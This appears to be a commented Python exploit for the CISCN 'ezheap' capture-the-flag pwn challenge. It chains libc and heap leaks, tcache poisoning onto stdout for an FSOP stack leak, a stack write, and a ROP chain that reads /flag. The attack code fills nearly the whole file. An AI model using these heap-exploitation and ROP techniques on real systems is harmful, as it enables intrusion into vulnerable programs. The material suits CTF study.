CISCN-PWN复现

ezheap

# --------------------------exploit--------------------------
def exploit() -> None:
    """Drive the full exploit chain against the ezheap target.

    Every line is an interaction with the running binary, so statement
    order is the whole point; nothing here can be reordered.  The stages:

      1. libc leak   - free a chunk too large for tcache (lands in the
                       unsorted bin), overflow up to its fd, print it.
      2. heap leak   - free a tcache-sized chunk and read back its
                       safe-linking-mangled fd (``chunk_addr >> 12``).
      3. stdout FSOP - tcache-poison a 0x30 chunk onto ``_IO_2_1_stdout_``
                       and rewrite the FILE so the next flush prints the
                       ``environ`` pointer (a stack address).
      4. stack write - tcache-poison the 0x210 bin onto a stack slot just
                       below a saved return address.
      5. ROP         - open("/flag") / read / write through ``syscall; ret``.

    Uses helpers defined elsewhere in the file (``add``, ``delte``, ``edit``,
    ``show``, ``uu64``, ``ru``, ``li``, ``db``, ``io``, ``libc``); their exact
    argument semantics are assumed from usage (``edit(idx, length, data)``,
    ``show(idx)`` prints until NUL) - confirm against the helper definitions.

    Portability caveat: the script mixes ``libc.sym`` lookups with raw
    offsets (0x21ACE0, 0x217600, 0x21b803 and every gadget address).  Those
    numbers are valid for exactly one glibc build; swapping the libc means
    re-deriving all of them.
    """
    li('exploit...')
    # Abandoned alternative kept from an earlier attempt: leak a code
    # pointer through the same overflow and derive the program base.
    # NOTE(review): the 0x4B1945A3C delta does not look like a plausible
    # PIE-relative offset - re-derive it before reviving this path.
    # add(0xf0,"A"*0x20) #0
    # add(0xf0,"A"*0x20) #1
    # add(0xf0,"A"*0x20) #2
    # add(0xf0,"A"*0x20) #3
    # delte(2)
    # delte(1)
    # edit(0,0x150,"B"*(0x100-1))
    # show(0)

    # main_base = u64(io.recvuntil("Wel", drop=True)[-6:].ljust(8, b"\x00"))-0x4B1945A3C
    # li("main_base ---------------> 0x%x"%main_base)

    # --- Stage 1: libc leak via the unsorted bin -----------------------
    # Chunk 1 is a 0x500-byte request: beyond the tcache range, so freeing
    # it puts it in the unsorted bin with fd/bk pointing into main_arena.
    add(0x200,"A"*0x20) #0
    add(0x500,"A"*0x20) #1
    add(0x200,"A"*0x20) #2
    add(0x200,"A"*0x20) #3
    add(0x200,"A"*0x20) #4
    add(0x200,"A"*0x20) #5
    delte(1) #1
    # The vulnerability: edit() accepts a length larger than the allocation.
    # 0x210 bytes from a 0x200-byte chunk run over chunk 1's prev_size and
    # size (size becomes 0x4242424242424242) and stop right before its fd.
    edit(0,0x300,"B"*(0x210))
    # show(0) prints until a NUL, so the arena pointer in chunk 1's fd comes
    # out immediately after the run of B's.
    show(0)
    # 0x21ACE0 is presumably main_arena+96 (unsorted-bin head) for the
    # target libc - confirm with `p &main_arena` in gdb.
    libc_base = uu64()-0x21ACE0
    # Only IO_2_1_stdout and _environ are used below.  mprotect/open/read/
    # puts/free_hook/setcontext+61 are leftovers (they hint at an abandoned
    # hook- or setcontext-based route).  Note that glibc >= 2.34 no longer
    # calls __free_hook even where the symbol still resolves.
    mprotect_addr = libc.sym['mprotect']+libc_base
    open_addr = libc_base+libc.sym['open']
    read_addr = libc_base+libc.sym['read']
    puts_addr = libc_base+libc.sym['puts']
    free_hook = libc_base +libc.sym['__free_hook']
    setcontext = libc_base + libc.sym['setcontext'] + 61
    IO_2_1_stdout = libc_base+libc.symbols['_IO_2_1_stdout_']

    li("libc_base ------------------> 0x%x"%libc_base)
    # Repair chunk 1's size field (0x511) before the next malloc walks the
    # unsorted bin - the clobbered size would trip a corruption check - then
    # take chunk 1 back out of the bin.
    edit(0,0x300,b"A"*(0x208)+p64(0x511))
    add(0x500,"BBB") #1



    # --- Stage 2: heap leak via a tcache fd ------------------------------
    # Free a tcache-sized chunk into an empty bin: its fd then holds only the
    # safe-linking key (its own address >> 12).  Overflow from chunk 4 up to
    # that fd and print it.
    delte(5)
    edit(4,0x300,"C"*(0x210))
    show(4)
    ru(b"C"*(0x210))
    # Undo the >> 12 mangling (5 bytes is enough for a heap address); the
    # -0x3000 places heap_base relative to chunk 5's page for this binary's
    # particular layout - tuned empirically, re-check in gdb if anything moves.
    heap_base = (u64(io.recv(5).ljust(8,b'\x00')) << 12)-0x3000
    li("heap_base ------------------> 0x%x"%heap_base)
    # Restore chunk 5's size and re-allocate it so the 0x210 bin is clean.
    edit(4,0x300,b"A"*(0x208)+p64(0x211))
    add(0x200,b"A"*0x20) #5



    # --- Stage 3: tcache poison onto stdout, then FSOP leak of environ ----
    add(0x50,"D"*0x20) #6

    # Overflow past chunk 6's 0x50 bytes into the 0x30 chunk that follows it
    # and replace that chunk's fd with a mangled pointer to stdout-0x20.
    # Safe-linking needs XOR with (address of the chunk holding the fd) >> 12;
    # using heap_base >> 12 assumes that chunk sits in the heap's first page.
    # NOTE(review): where this free 0x30 chunk comes from is not visible in
    # this function (likely allocated by the program itself) - confirm.
    edit(6,0x500,b'a'*0x50+p64(0)+p64(0x31)+p64((IO_2_1_stdout-0x20) ^ ((heap_base) >> 12)))
    target_addr = libc_base+libc.symbols['_environ']


    add(0x20,"a")#7   (pops the poisoned chunk from the 0x30 bin)
    add(0x20,"a")#8   (returns the fake chunk at _IO_2_1_stdout_-0x20)


    # Rewrite _IO_2_1_stdout_: flags 0xfbad1800 plus _IO_write_base=&environ
    # and _IO_write_ptr=&environ+8 make the next flush emit those 8 bytes, a
    # stack pointer.  The three zero qwords and libc_base+0x217600 land in the
    # 0x20 bytes before stdout (presumably the tail/vtable of the preceding
    # FILE - confirm), and 0x21b803 fills the three read pointers.  Both raw
    # offsets are build-specific.
    payload = p64(0)*3+p64(libc_base+0x217600)+p64(0xfbad1800)+p64(libc_base+0x21b803)*3+p64(target_addr)+p64(target_addr+8)
    edit(8,0x500,payload)
    stack_addr = uu64()
    li("stack_addr = "+hex(stack_addr))

    # NOTE(review): debugger hook left in; depending on how db() is defined
    # this pauses for a gdb attach - drop it for an unattended/remote run.
    db()
    # --- Stage 4: tcache poison into the stack ---------------------------
    # Free 0 then 4 so the 0x210 bin head is chunk 4 (-> chunk 0).  Overflow
    # from chunk 3 into chunk 4's fd with the mangled stack target; the XOR
    # key assumes chunk 4 lies in the heap page at heap_base+0x2000.
    delte(0) #0
    delte(4) #4
    payload = b'a'*0x200+p64(0)+p64(0x211)+p64((stack_addr - 0x178) ^ ((heap_base+0x2000) >> 12))
    edit(3,0x500,payload)
    # Drains chunk 4; the following 0x200 request returns the stack address.
    add(0x200,"a") #0



    # Gadget offsets for the target libc build - raw numbers, unlike the
    # libc.sym lookups above; re-derive them if the libc changes.
    pop_rdi_ret = libc_base+0x000000000002a3e5
    pop_rsi_ret = 0x000000000002be51+libc_base

    pop_rdx_ret = 0x0000000000170337+libc_base
    pop_rax_ret = 0x0000000000045eb0+libc_base
    syscall_ret = libc_base+0x0000000000091316
    # The chunk data lands 8 bytes below a saved return address (relative to
    # the environ pointer), so the path string sits at flag_addr and the ROP
    # chain starts at flag_addr+8.
    flag_addr = stack_addr - 0x178

    # open("/flag", O_RDONLY): rdi=&"/flag", rsi=0, rax=2, syscall.
    payload = b'/flag\x00'.ljust(8,b'\x00')+p64(pop_rdi_ret)+p64(flag_addr)+p64(pop_rsi_ret)+p64(0)+p64(pop_rax_ret)+p64(2)+p64(syscall_ret)
    # read(3, stack_addr+0x300, 0x50): assumes open() returned fd 3.
    # NOTE(review): b'a'*6+p64(0) is 14 bytes, so the value after pop_rax_ret
    # is not qword-aligned - a plain `pop rax; ret` would load b'aaaaaa\0\0'
    # into rax and return to a skewed address.  This only works if a gadget
    # here consumes a different number of stack words than its name implies;
    # verify in gdb (p64(0) alone would be the aligned form).
    payload += p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(stack_addr+0x300)+p64(pop_rdx_ret)+p64(0x50)+p64(pop_rax_ret)+b'a'*6+p64(0)+p64(syscall_ret)
    # write(1, stack_addr+0x300, 0x50): same 6-byte skew before p64(1).
    payload += p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(stack_addr+0x300)+p64(pop_rdx_ret)+p64(0x50)+p64(pop_rax_ret)+b'a'*6+p64(1)+p64(syscall_ret)


    # The poisoned 0x200 request returns the stack slot; writing the payload
    # there overwrites the saved return address, and the chain runs when that
    # function returns.
    add(0x200,payload)